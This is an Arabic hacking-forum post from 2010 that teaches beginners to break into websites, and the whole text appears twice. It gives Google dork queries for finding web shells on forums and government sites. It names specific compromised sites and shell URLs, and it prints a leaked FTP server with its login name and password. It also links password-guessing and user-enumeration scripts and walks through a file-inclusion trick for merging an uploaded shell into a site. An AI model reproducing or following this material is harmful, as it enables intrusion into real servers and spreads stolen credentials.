virus3033
12-26-2010, 01:20 AM
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاااته
للبحث عن الشيلات المرفوعه
وهذا من الامثلة الي استخدمها
اضغط هون (http://www.google.com.sa/search?hl=ar&safe=active&client=firefox-a&rls=org.mozilla%3Aar%3Aofficial&q=Run+SQL+query+Type+4++SQL-Server+%3A+Port+4+%3A+Login+%3A+Password+4+%3A+Dat abase+4++SQL+query+4&btnG=%D8%A8%D8%AD%D8%AB&meta=&aq=f&aqi=&aql=&oq=&gs_rfai=)
واذا تريد اختراق منتدى
هيك inurl:vb;-rw-r--r--
او inurl:forum;-rw-r--r--
موقع حكومي inurl:gov;-rw-r--r--
الخ
شيلات مرفوعه ع احدث ثغره inurl:.php?main_page=;-rw-r--r--
الامثله
http://www.mediashak.com/index.php?main_page=site_map
http://www.enexweb.com/index.php?main_page=conditions
كيف تجد الشل ؟ شوف الملفات php
للاسف ما صد الى ثلاثه من المواقع الحكوميه
في طريقه اخر للاختراق عن طريق برنامج ftp
الدوريك هو intitle:Index of;ftp.txt
الامثله
http://www.sg-soc.com/Files/DeryniHaven-FTP.txt
و
http://ganarsiempre.ga.funpic.de/ftp.txt
Server - maroa.pair.com
Login Name: derynihv
Password - Cougar390
بس اول خطوه بعد الحصول ع شل او ftp ارفع سكربت التخمين
1-
http://losarquerosspain.com/c.txt
سكربت تخمين
http://losarquerosspain.com/xp-Cracker V2.php
امثلة الباسبوردات
112233
123123
123456
12345678
password
......الخ
2-
بيرل
http://losarquerosspain.com/p.txt
لعرض اليوزدات مع المواقع
http://losarquerosspain.com/domain.pl
خايف ارفع شل ع السيرفر الاسباني تقومو بختراقه
بس هذي الشيلات للتعليم المبتدين فقط يا ليت ما احد يقوم بختراقها
الشل الاول تنقل ع السيرفر
http://kikker.com/biage/s.php
uid=99(nobody) gid=99(nobody) groups=99(nobody)
تعلم طريقة التخطي و سحب الرووووت
http://www.philipsxenon.com/googlefroogle.php
في طريقه لرفع صيغة شيل txt وطريقه دمجها بين الملفات الموقع
مثال هذا الموقع
http://hostfile.org/
الملف المصاب
http://hostfile.org/viewfile.php
شيل
http://hostfile.org/gromp.txt
الدمج
http://hostfile.org/viewfile.php?file=gromp.txt
ما ضبط بس تم الدمج
لو ضبط صار هيك
http://www.enexweb.com/index.php?main_page=conditions
كان ودي يطول الشرح بس ان شاء الله و صلت الفكره
باتوفيق
السلام عليكم ورحمة الله وبركاااته
للبحث عن الشيلات المرفوعه
وهذا من الامثلة الي استخدمها
اضغط هون (http://www.google.com.sa/search?hl=ar&safe=active&client=firefox-a&rls=org.mozilla%3Aar%3Aofficial&q=Run+SQL+query+Type+4++SQL-Server+%3A+Port+4+%3A+Login+%3A+Password+4+%3A+Dat abase+4++SQL+query+4&btnG=%D8%A8%D8%AD%D8%AB&meta=&aq=f&aqi=&aql=&oq=&gs_rfai=)
واذا تريد اختراق منتدى
هيك inurl:vb;-rw-r--r--
او inurl:forum;-rw-r--r--
موقع حكومي inurl:gov;-rw-r--r--
الخ
شيلات مرفوعه ع احدث ثغره inurl:.php?main_page=;-rw-r--r--
الامثله
http://www.mediashak.com/index.php?main_page=site_map
http://www.enexweb.com/index.php?main_page=conditions
كيف تجد الشل ؟ شوف الملفات php
للاسف ما صد الى ثلاثه من المواقع الحكوميه
في طريقه اخر للاختراق عن طريق برنامج ftp
الدوريك هو intitle:Index of;ftp.txt
الامثله
http://www.sg-soc.com/Files/DeryniHaven-FTP.txt
و
http://ganarsiempre.ga.funpic.de/ftp.txt
Server - maroa.pair.com
Login Name: derynihv
Password - Cougar390
بس اول خطوه بعد الحصول ع شل او ftp ارفع سكربت التخمين
1-
http://losarquerosspain.com/c.txt
سكربت تخمين
http://losarquerosspain.com/xp-Cracker V2.php
امثلة الباسبوردات
112233
123123
123456
12345678
password
......الخ
2-
بيرل
http://losarquerosspain.com/p.txt
لعرض اليوزدات مع المواقع
http://losarquerosspain.com/domain.pl
خايف ارفع شل ع السيرفر الاسباني تقومو بختراقه
بس هذي الشيلات للتعليم المبتدين فقط يا ليت ما احد يقوم بختراقها
الشل الاول تنقل ع السيرفر
http://kikker.com/biage/s.php
uid=99(nobody) gid=99(nobody) groups=99(nobody)
تعلم طريقة التخطي و سحب الرووووت
http://www.philipsxenon.com/googlefroogle.php
في طريقه لرفع صيغة شيل txt وطريقه دمجها بين الملفات الموقع
مثال هذا الموقع
http://hostfile.org/
الملف المصاب
http://hostfile.org/viewfile.php
شيل
http://hostfile.org/gromp.txt
الدمج
http://hostfile.org/viewfile.php?file=gromp.txt
ما ضبط بس تم الدمج
لو ضبط صار هيك
http://www.enexweb.com/index.php?main_page=conditions
كان ودي يطول الشرح بس ان شاء الله و صلت الفكره
باتوفيق